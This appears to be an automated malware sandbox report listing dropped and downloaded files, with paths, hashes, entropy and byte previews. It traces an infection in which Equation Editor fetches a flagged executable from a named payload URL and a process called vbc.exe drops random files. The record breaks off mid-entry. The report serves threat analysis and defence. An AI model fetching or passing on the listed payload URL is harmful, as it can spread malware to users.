Preview:	1I533y4o2432sC09mPm14467Qm6RA4L3630s7YE9op7c6b35odL61Lv..E7R51t4675ep5Ne6BiS0EVrm7941A62Qm50xJP378E4830gEMF779o28LuQ85658RPRC5z5wEd607f9x27tEx8D542xU8xPHPe3o67493w47..m68nw5a8Y8EbK695k64w59v32815nelJ8iD81512w56m456Tm7JwER87Xn4g743VO..b582271uI6v1889C253tZu7Eol9r48z96EP902UcK8N4..Q99p11T43P4U9DdHofE6n0V7E688JLM77fJ1Bg1A27hI37H0CG12nJJ3..413p6It95893mo4w0O5P62957LSuqhwb006fPI0t3i9DXt1bo8wtD7MR3Zx20865TV4zn64V2ka5cHZ8zR5w58476k94u9RWF7Qd8763KL041A54pJU3fP824dlbfzgRBtpQ919S269X77SNg4975u0z276n8mo584012t3Er88LRv7o02V667..

C:\Users\user\33920049\srslmbkgam.xml Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	545
Entropy (8bit):	5.5258847043058905
Encrypted:	false
SSDEEP:
MD5:	B98459F0500F47B7B583B0C519CCF3CB
SHA1:	5D8012DB878B3F72B7A5736525F587330F988A96
SHA-256:	E52F7062BE09E0B5653629D3E3738EF2B514BA971CFA25EED7BE051466EE0E26
SHA-512:	C136360F2444CBB26A4DC20B7BBE04F1040D2F796D75FCE5274F612DB869E4943C7687E7AC457C705C5925545641A891E7CE242BAA2E7A993F9849F891E8D465
Malicious:	false
Preview:	GfD67N14eP8m1bN0fj0735N5f7v16q74W0C6Fs1q9l0o69se079um04K990PHo534Wi01vo5283qCXNJn83jG8m82PO61d1Si516K91925Qj542034Q5iq89tsas25j3WopZ65477Z08bF8mg48O9..vt1Ml5Z9yNR2m04028522aBAD99a8yr110Y655K5F8pDBr8wVJzJN75b1SDb7p616j10G18saj8x2In7wu2as1zt28768OU69P21D0Fj47Hmo6CVCz7yog178I25q68238TZ45fm7CC96P323948b8S3zK6xxz3..Z1C6n3556UD4dEJN7n5ZM7Lwdk11258DL9xP2uHt9D13L0GJ2HLiuOP8CyF1o9pT652GHr51TTl..QH2YsYeY2I6vg9..0e664n6Q39X5cs61w0Tc6A1nb1RZETK43DtvyY7OA35S15SLXM722on443pD183T88lFNr3b..4n766KanwrN8GUh21b2lzn0G691JTqM0xOe72G67e681m9242JaaxmlQTr32R511..

C:\Users\user\33920049\suktleoxtu.msc Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	540
Entropy (8bit):	5.547551481633137
Encrypted:	false
SSDEEP:
MD5:	BA57AA240C24091DC77E1E2EF7A99C10
SHA1:	A013814DFDF3086EA88DBAA42D1D5269CE08DC0D
SHA-256:	619C6857EA9C69C098E3AC990BE2B99B25EC1A75821081EAD723C9EF6F718FB2
SHA-512:	498B2133DDF75BB946A763216E8E757E902F7E6AEF565DB689B02B0A02526455EADAD1C1642924E7A611537428CF2D79B8314A7A05E041963F4D9328C61C4168
Malicious:	false
Preview:	7UeM9q9Mw18la8h385V2TY2J67875Z415miZD33XVD0fWsExvLj56QAB58zX50n866r0NMz3B91j75lAXO7664KTr03P97iu5a0e3ok9m1x8129442b30jF..bs835342OD650H5VCHlYXK5D9q4G0c4r365k4T5w6089C5ltN642O88P45K4d94fZ5D25Dp2x..o19q50od04s7y9uAfLrQ16c56n1J1Hw8501Va8Yhh..S002hzAenP3Vw8fbX26XmO3..6G07391a8EW371DR721Be1RrMyP7..zW017Nt62Z9m63V1B3KU58U52U67FRZRp6954lN4m3AnMWKz1Td5XR317VBtmPA47Tq3bRI5u..5221XFy1Ly4z3KR5898U54vHI1590032Q0A5J6J004FlS7FiSyZ34Z2R229KecLYwHuYohCaJ0y41344EOEH12107gfpU3B3t655Y3noEi92m1g5..7Jom47612d63Ulao436XWsS378O888QuW2Rt11526Hn302bDdS067x9..

C:\Users\user\33920049\ujhg.cpl Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	535
Entropy (8bit):	5.501943056038449
Encrypted:	false
SSDEEP:
MD5:	5F2BBE62D3EB28228186CD6964305381
SHA1:	46E019DA6F7ECE17D7500B963C80FF076B3B449C
SHA-256:	68C1BA695059F1E975FA07FF00BF77FD3B6E56EA4940E9E4AB5F7AA0FA33416E
SHA-512:	2F5AD3C6E6602C9980C530CD9380FEAB3CCDF1C2D836174F25EBF30C924D08FB958235B27C016CF2A0EEC51BACF50DAC685546778B893567AE3B51A89BEE1A4B
Malicious:	false
Preview:	WYk9Z859egc932519..B1M893TLb60Wf52J8ek0NdwiS96mdZg2e6X3V4DQ2VK63x83ud6I7lI593y276RNF9f9Lyzof8xR7HQa..N5k36V5598E7m2Ge3sZnA1cR0X9A0840084Z4610jL3Y38ZtWkdx8W03CGX2C5p5bCy4992Eh6r93p9tim053v1KPOjlY6J2E9CscL2CD8J835FPZZD36tBAcE3r204118YY5Clk7718n8529957Y09Sge8gYEJO466L..dNXk7sz8P4O49..f4ipv3W5RpW67D3W2rRW97v75N2veXA2C..QZP0q13Qf5771nOH6Y1r324r4244134971S9137oajWV519gX83400I85a218uZUs279IFN96..p0HuyY80xR8V7v6lh90hHN4e7OL6jG745402303t23Cx738n2GQ52R69S8Y7Z8t874EBQYG4229Y250Du3vVQ587an210h4gko80F462F2cw4g49xM226E4k091W4092cauuq5zUZ0yDB..

C:\Users\user\33920049\vusklntwi.docx Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	554
Entropy (8bit):	5.451419215130869
Encrypted:	false
SSDEEP:
MD5:	9D55DE9BCF880293EFC22A6EDF63D727
SHA1:	91BFA94E624F6A6C9891922931A650F3BDF014AF
SHA-256:	2EF84FFD76915FDBBAF0CC328B1AD11F7F0967D295AC7077F68C44F2DA67B75F
SHA-512:	3303BDC222A120225D36B48C6DCB24388FEEB8BC90A5FC84D8174C9CE487645D9435B31482E5D64057B52727ACC5EAF782E4B07D74FC29B32314F361186DE9EE
Malicious:	false
Preview:	e970K3K6t9k2e7O15tdejT7Sn7Qq5APO42D5c8DI2fzf170P7dM5E3URj68949M63pB660308..0Z7nFeV2Aj4d45E50826tzsFsCPc95Od6GlD5568n52Zb572al7J0J26cMon4..1004c08I4Vc1vEb84a1O05D0929v1dyJ3UTASw95H4X6il2g5qExNde32LC..E0P9AHDhBC160i4up784p9oJ210L9q5n45q1RF31L6O980D51ll9l010621T69ldG2xIx78ffqsCFS45q91gZS85i6R3sQ98xCR66HW9wZ7auPo2e3s25g5u0d762507u00ziT24V..43093P76L72429500832170O89Tu2g375949v..35ln5As955lr0m8073125L228boRR8623c2y99W97zd3vCc5R1QLck4nPi7XsmTH354817AY25392CS00..2O56h1BS43V8xK7905G6Lk64Mye6SI830p8TLf13Z05oQ74oGN49D651WnZCp46aN8BMMTmKs7X02F635ZS4M07D48a0..

C:\Users\user\33920049\weqn.txt Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.441373794856656
Encrypted:	false
SSDEEP:
MD5:	E887844DDB3C6BC8C9BA7ABF0963B162
SHA1:	5B1955F3EC2985EDA50632650FB71150AD311794
SHA-256:	4E47AFF41CBC53A8C36A9F3446DB8EFCF8B4BADD7808F7B58D57BB6F4082CA1F
SHA-512:	5F856E4D003D5822FEC6CB2A4F633259073D3BDDA70C475449213247B69DB68429BBC487B6DEFB016984FDD539599C00AE54DC941E686A115DEB0C0FCF9ECB1B
Malicious:	false
Preview:	VP1g07wz1m0513k47YE8U851zGONd88Z5px79e2NjXh10s645JS0S7034NpbhvB09zFfF66h5aLQyJaVOBRC8o7088Q30uxsb08Isv0D613D0wC4965d63Y14Q2o583v3664v2229j11X027..7v8K42r01w7T5LN3Eni4i6qu0NZj30S7h84H7A2Gt11L26O6O56F46..2I83MCFHIt12qK028V141AxZ6HLD5..617284669S3o8669s4p4v1Q2ep4j9AK1r9pDaV797ADlp..oo6yHV670255r7sJjSt04Th4O644Q16Njs67OA8B1TtOmI0d5747bFL6kjm6765778jtU0t7415r545lqn3wx37Dxi53133N41dI9874v41iTD44XG51s8LxSg8Ce88X6y3752KC39Wf0Z54194yUS0t2H..cvFZz9g9J20eZ9JE2znZf8tT858064t3w9XN6Zj4S35083O428Yw76Ol5s916tP77o3b6O81798HR479p1132XHb30IfQk8Le07Emvxj8K8xE1065Sj1359Pk..

C:\Users\user\33920049\wsxedltsm.cpl Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.5485404237595715
Encrypted:	false
SSDEEP:
MD5:	CEE5E8C575EC77654A20CB99615CEBF6
SHA1:	D43519CD61E556D88080FF2640150B2BBE34AE7D
SHA-256:	2A4C2DF427A70334733E5CB06304BFF74499D6850AE736F82B06A52B0D850D61
SHA-512:	573E6B89DC25A143F133993435C60719439EF51409199F433DFD12E772A4222F2DF8EEBDC155A42C102C17440A88B37B20F7BE698F368E34B174F0BD490BA0E8
Malicious:	false
Preview:	j29pidJ632cP7m999gkKsD0j6ghShsM38o7044RP7Ry1v0D888gk5htmLu663YfJhO06X446m494rW5q430s25224nA5oW246424z99b4P9zAu4EB4mF235YE764yX91e592790Ihqq893Z..T4bA1h5yY30ud1Tvjy154Dt77m922w607kylHTt65zj3p157727D361go3W3H276..Ha90V8hLz4c9Jm20xp957FDjDbQU75K5e19I2uCiqYcYnRzxG4wtX12X9m81TN32tH6..DuZb30cne54764I51E6C03OC1H6Wm35D..9M9mH5E9u9CT4ag00JHrjP804Qj62h9IwODNBQ01ub8211o4Vpa5lZ32v243x3kv26V7Mz3CWF106X5Q081BU2P7HgUU670739762Iec6jkup5VgFT611hA0cSK3Qy01BYz720na9FGc25s3Rb059M87b2BalfPH0rH6PI0K6v2aBeT4R602716..t1r6T88039gP9D0FS64p9475N8TCSJ34RrJ7tylz1cN954P1I93Qi34418xA0bR3Q077B2S03nw5cXNvEV8997yp2S8l7K3Jv7Yjy9I..

C:\Users\user\33920049\xtax.log Download File
Process:	C:\Users\Public\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	518
Entropy (8bit):	5.459797846755074
Encrypted:	false
SSDEEP:
MD5:	32834BAFB3B1871301A6BA9BEF2C5687
SHA1:	786CD933E49C5657480DB1485B0609F8DFEC11CE
SHA-256:	DF899EAC1B5F6515CBDA8B816319FF0F89D7FF9E4FBDAEC52C75E1505105CD95
SHA-512:	A3864E623BA6AD918138D3BFA27F8F2E7AFC4F2005BA7DB655D1798CEBB5CAFDBF06D44929364CF363AEFD3F7B4AB48C37B75B3548CA711E5C6B3AB68CEC1714
Malicious:	false
Preview:	909r1Px20Vlvk4D76LUZf57A31de05v0R7709Vp87M5t3r167Gb1wF24F573H0MiBP1al6x1l5142F6Hki..69kqz2S7IQ32t2YP58S4P2OC88MxtyYLNV6Rcl39564b85881x2216800eMh1519wQ24OQxher8l87B64L8be02406Iq..9wzX9PTl5..16x766JTG2I2l13885Tm69G4R4301657a39p3R38YIaD898fExjk7U8LO516629613D115o6WiB6F6043kq7f6TphpsG6V83..425be6T7gC64b703lXA1W1E9338S3c64O3c0B487ut5dK2vq4Ev4P5ZbwzxY2v5z78mg2rj860fmFhB3Tu2Gbzmv..1D82sAGc954k747g6a8F88c76au6O4h93306DJgBe54Ik2SU8rfE2On356ZsD3i2517eg3F2Py9007Zh2Oab5LR8494p0h72G894zZ38FZPQ3F80D1D7Wzc3Vs9867t6mlLttd2e4w6..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	1073384
Entropy (8bit):	7.832162830296474
Encrypted:	false
SSDEEP:
MD5:	B866823E1F8F4A52376BD108C457DD78
SHA1:	FE99849EC27630463080445337798EEBA8000A02
SHA-256:	EBE1BB18A77CF0B34D3AD06919A9ADFFF2AA69CFAFA5B96B670534B890E3E2A8
SHA-512:	FD1732CA7DC310395581D835EA3DF1E7AD664C75C9C7F68BA55C0B2E521383A0C8781B490F7CC05428D6E534B356A585BF11B57E57808CC37EA08DABF4A09E13
Malicious:	true
IE Cache URL:	https://demopicking.renova-sa.net/asdERTYgh56F.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}\|^.....................(............... ....@.......................................@.........................@...4...t...<.... ..(L...................p...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...(L... ...N..................@..@.reloc...!...p..."..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\asdERTYgh56F[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	258
Entropy (8bit):	5.197363170848063
Encrypted:	false
SSDEEP:
MD5:	4FAA690718E86B391CBF386BAB2C578D
SHA1:	3349E293E3E63929F8EDFCFA93CF393B0BACAC61
SHA-256:	F70CAB022EB2B94C482515B83655102FED91D729161C322273C6234B6FF00FDC
SHA-512:	655685251E747518F793EE0903CED5C17EEFF8787883309C0797F316A8654C9D095FCB86F0B0D144ABE5B4806DC9A1775A443A5A0DD6A5A0520668CAEC8409B4
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://demopicking.renova-sa.net/asdERTYgh56F.exe">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26B84B08.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0CBBE5F.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B908FF69.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDBC2463.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF7984D4.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C009AF6A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5A013CD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D57D5BFC.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6B61027.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
